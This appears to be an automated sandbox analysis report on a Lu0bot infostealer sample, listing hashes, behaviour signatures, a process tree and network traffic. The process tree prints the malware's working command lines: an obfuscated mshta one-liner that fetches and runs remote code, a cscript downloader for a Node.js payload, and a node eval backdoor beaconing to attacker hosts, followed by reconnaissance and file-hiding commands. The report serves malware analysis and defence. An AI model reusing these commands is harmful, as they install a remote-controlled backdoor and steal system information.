Analysis

  • max time kernel
    149s
  • max time network
    181s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    11-07-2021 14:17

General

  • Target

    usfive_20210711-154344.exe

  • Size

    3KB

  • MD5

    15467567c301ef6ae8b98d4fafb6db67

  • SHA1

    9884574ad77b49580ab14047342b4580324cb6ee

  • SHA256

    9db5c02ac4e161369160fe13719a212e55377dd57ffc9f98b7141bce3b9df26c

  • SHA512

    5b3d68e59a908312a8e009d2b6ec4af06be67ee7a762d996ed914de9c00bf5edd57dd38f8eaac52bff5ff8a42e7760b7503b517c671bffc37bb55327b37382b1

Malware Config

Signatures

  • Lu0bot

    Lu0bot is a lightweight infostealer written in NodeJS.

  • Blocklisted process makes network request 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Gathers network information 2 TTPs 2 IoCs

    Uses commandline utility to view network configuration.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • NTFS ADS 2 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 42 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\usfive_20210711-154344.exe
    "C:\Users\Admin\AppData\Local\Temp\usfive_20210711-154344.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1092
    • C:\Windows\SysWOW64\mshta.exe
      mshta "javascript:document.write();184;y=unescape('%325%31%7E%68t%74p%3A%2F%2Fl%751%2Ea%73i%61%2F%68r%69%2F%3F2%31a%36e%34b%7E3%34').split('~');29;try{x='WinHttp';55;x=new ActiveXObject(x+'.'+x+'Request.5.1');187;x.open('GET',y[1]+'&a='+escape(window.navigator.userAgent),!1);165;x.send();220;y='ipt.S';191;new ActiveXObject('WScr'+y+'hell').Run(unescape(unescape(x.responseText)),0,!2);204;}catch(e){};30;;window.close();"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of WriteProcessMemory
      PID:1992
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /d/s/c cd /d "C:\ProgramData" & mkdir "DNTException" & cd "DNTException" & dir /a node.exe || ( echo x=new ActiveXObject("WinHttp.WinHttpRequest.5.1"^);x.Open("GET",unescape(WScript.Arguments(0^)^),false^);x.Send(^);b=new ActiveXObject("ADODB.Stream"^);b.Type=1;b.Open(^);b.Write(x.ResponseBody^);b.SaveToFile(WScript.Arguments(1^),2^); > get1626014142501.txt & cscript /nologo /e:jscript get1626014142501.txt "http%3A%2F%2Fasu02.shop%2Fhri%2F%3F2fee0e72c%26b%3Dfa1d848c" node.cab & expand node.cab node.exe & del get1626014142501.txt node.cab ) & echo new ActiveXObject("WScript.Shell").Run(WScript.Arguments(0),0,false); > get1626014142501.txt & cscript /nologo /e:jscript get1626014142501.txt "node -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%27fee0e72c%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27asu00.xyz%27);s.send(b,0,b.length,19584,%27lu0.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))" & del get1626014142501.txt
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1500
        • C:\Windows\SysWOW64\cscript.exe
          cscript /nologo /e:jscript get1626014142501.txt "http%3A%2F%2Fasu02.shop%2Fhri%2F%3F2fee0e72c%26b%3Dfa1d848c" node.cab
          4⤵
          • Blocklisted process makes network request
          PID:1536
        • C:\Windows\SysWOW64\expand.exe
          expand node.cab node.exe
          4⤵
          • Drops file in Windows directory
          PID:1468
        • C:\Windows\SysWOW64\cscript.exe
          cscript /nologo /e:jscript get1626014142501.txt "node -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%27fee0e72c%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27asu00.xyz%27);s.send(b,0,b.length,19584,%27lu0.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))"
          4⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:516
          • C:\ProgramData\DNTException\node.exe
            "C:\ProgramData\DNTException\node.exe" -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%27fee0e72c%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27asu00.xyz%27);s.send(b,0,b.length,19584,%27lu0.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))
            5⤵
            • Executes dropped EXE
            • Checks processor information in registry
            • NTFS ADS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:396
            • C:\Windows\SysWOW64\cmd.exe
              cmd.exe /c dir C:\
              6⤵
                PID:880
              • C:\Windows\SysWOW64\cacls.exe
                cacls.exe C:\ProgramData\DNTException /t /e /c /g Everyone:F
                6⤵
                  PID:1592
                • C:\Windows\SysWOW64\icacls.exe
                  icacls.exe C:\ProgramData\DNTException /t /c /grant *S-1-1-0:(f)
                  6⤵
                  • Modifies file permissions
                  PID:924
                • C:\Windows\SysWOW64\attrib.exe
                  attrib.exe +H C:\ProgramData\DNTException
                  6⤵
                  • Views/modifies file attributes
                  PID:1916
                • C:\Windows\SysWOW64\attrib.exe
                  attrib.exe +H C:\ProgramData\DNTException\node.exe
                  6⤵
                  • Views/modifies file attributes
                  PID:1768
                • C:\Windows\SysWOW64\tasklist.exe
                  tasklist /fo csv /nh
                  6⤵
                  • Enumerates processes with tasklist
                  • Suspicious use of AdjustPrivilegeToken
                  PID:972
                • C:\Windows\SysWOW64\Wbem\wmic.exe
                  wmic process get processid,parentprocessid,name,executablepath /format:csv
                  6⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:864
                • C:\Windows\SysWOW64\ipconfig.exe
                  ipconfig.exe /all
                  6⤵
                  • Gathers network information
                  PID:564
                • C:\Windows\SysWOW64\route.exe
                  route.exe print
                  6⤵
                    PID:592
                  • C:\Windows\SysWOW64\netstat.exe
                    netstat.exe -ano
                    6⤵
                    • Gathers network information
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1028
                  • C:\Windows\SysWOW64\systeminfo.exe
                    systeminfo.exe /fo csv
                    6⤵
                    • Gathers system information
                    PID:1660

        Network

        • flag-unknown
          DNS
          lu1.asia
          mshta.exe
          Remote address:
          8.8.8.8:53
          Request
          lu1.asia
          IN A
          Response
          lu1.asia
          IN A
          5.188.206.211
        • flag-unknown
          GET
          http://lu1.asia/hri/?21a6e4b&a=Mozilla/4.0%20%28compatible%3B%20MSIE%207.0%3B%20Windows%20NT%206.1%3B%20WOW64%3B%20Trident/7.0%3B%20SLCC2%3B%20.NET%20CLR%202.0.50727%3B%20.NET%20CLR%203.5.30729%3B%20.NET%20CLR%203.0.30729%3B%20Media%20Center%20PC%206.0%3B%20.NET4.0C%3B%20.NET4.0E%3B%20InfoPath.3%29
          mshta.exe
          Remote address:
          5.188.206.211:80
          Request
          GET /hri/?21a6e4b&a=Mozilla/4.0%20%28compatible%3B%20MSIE%207.0%3B%20Windows%20NT%206.1%3B%20WOW64%3B%20Trident/7.0%3B%20SLCC2%3B%20.NET%20CLR%202.0.50727%3B%20.NET%20CLR%203.5.30729%3B%20.NET%20CLR%203.0.30729%3B%20Media%20Center%20PC%206.0%3B%20.NET4.0C%3B%20.NET4.0E%3B%20InfoPath.3%29 HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: lu1.asia
          Response
          HTTP/1.1 200 OK
          Content-Type: text/plain;charset=UTF-8
          Server: Caddy
          X-Powered-By: PHP/7.3.25
          Date: Sun, 11 Jul 2021 14:35:42 GMT
          Transfer-Encoding: chunked
        • flag-unknown
          DNS
          asu02.shop
          cscript.exe
          Remote address:
          8.8.8.8:53
          Request
          asu02.shop
          IN A
          Response
          asu02.shop
          IN A
          5.188.206.211
        • flag-unknown
          GET
          http://asu02.shop/hri/?2fee0e72c&b=fa1d848c
          cscript.exe
          Remote address:
          5.188.206.211:80
          Request
          GET /hri/?2fee0e72c&b=fa1d848c HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: asu02.shop
          Response
          HTTP/1.1 200 OK
          Content-Type: application/octet-stream
          Server: Caddy
          X-Powered-By: PHP/7.3.25
          Date: Sun, 11 Jul 2021 14:35:43 GMT
          Transfer-Encoding: chunked
        • flag-unknown
          DNS
          asu00.xyz
          node.exe
          Remote address:
          8.8.8.8:53
          Request
          asu00.xyz
          IN A
          Response
          asu00.xyz
          IN A
          5.188.206.211
        • flag-unknown
          DNS
          lu0.viewdns.net
          node.exe
          Remote address:
          8.8.8.8:53
          Request
          lu0.viewdns.net
          IN A
          Response
        • 5.188.206.211:80
          http://lu1.asia/hri/?21a6e4b&a=Mozilla/4.0%20%28compatible%3B%20MSIE%207.0%3B%20Windows%20NT%206.1%3B%20WOW64%3B%20Trident/7.0%3B%20SLCC2%3B%20.NET%20CLR%202.0.50727%3B%20.NET%20CLR%203.5.30729%3B%20.NET%20CLR%203.0.30729%3B%20Media%20Center%20PC%206.0%3B%20.NET4.0C%3B%20.NET4.0E%3B%20InfoPath.3%29
          http
          mshta.exe
          655 B
          2.6kB
          5
          4

          HTTP Request

          GET http://lu1.asia/hri/?21a6e4b&a=Mozilla/4.0%20%28compatible%3B%20MSIE%207.0%3B%20Windows%20NT%206.1%3B%20WOW64%3B%20Trident/7.0%3B%20SLCC2%3B%20.NET%20CLR%202.0.50727%3B%20.NET%20CLR%203.5.30729%3B%20.NET%20CLR%203.0.30729%3B%20Media%20Center%20PC%206.0%3B%20.NET4.0C%3B%20.NET4.0E%3B%20InfoPath.3%29

          HTTP Response

          200
        • 5.188.206.211:80
          http://asu02.shop/hri/?2fee0e72c&b=fa1d848c
          http
          cscript.exe
          37.2kB
          2.3MB
          805
          1564

          HTTP Request

          GET http://asu02.shop/hri/?2fee0e72c&b=fa1d848c

          HTTP Response

          200
        • 8.8.8.8:53
          lu1.asia
          dns
          mshta.exe
          54 B
          70 B
          1
          1

          DNS Request

          lu1.asia

          DNS Response

          5.188.206.211

        • 8.8.8.8:53
          asu02.shop
          dns
          cscript.exe
          56 B
          72 B
          1
          1

          DNS Request

          asu02.shop

          DNS Response

          5.188.206.211

        • 8.8.8.8:53
          asu00.xyz
          dns
          node.exe
          55 B
          71 B
          1
          1

          DNS Request

          asu00.xyz

          DNS Response

          5.188.206.211

        • 8.8.8.8:53
          lu0.viewdns.net
          dns
          node.exe
          61 B
          121 B
          1
          1

          DNS Request

          lu0.viewdns.net

        • 5.188.206.211:19584
          asu00.xyz
          node.exe
          20.2kB
          33.2kB
          156
          145

        MITRE ATT&CK Enterprise v6

        Downloads

        • memory/396-74-0x0000000014100000-0x0000000014101000-memory.dmp

          Filesize

          4KB

        • memory/396-75-0x0000000034000000-0x0000000034001000-memory.dmp

          Filesize

          4KB

        • memory/396-76-0x0000000035C00000-0x0000000035C01000-memory.dmp

          Filesize

          4KB

        • memory/396-77-0x000000000E300000-0x000000000E301000-memory.dmp

          Filesize

          4KB

        • memory/396-78-0x000000001D000000-0x000000001D001000-memory.dmp

          Filesize

          4KB

        • memory/396-73-0x0000000024700000-0x0000000024701000-memory.dmp

          Filesize

          4KB

        • memory/1536-63-0x0000000075A31000-0x0000000075A33000-memory.dmp

          Filesize

          8KB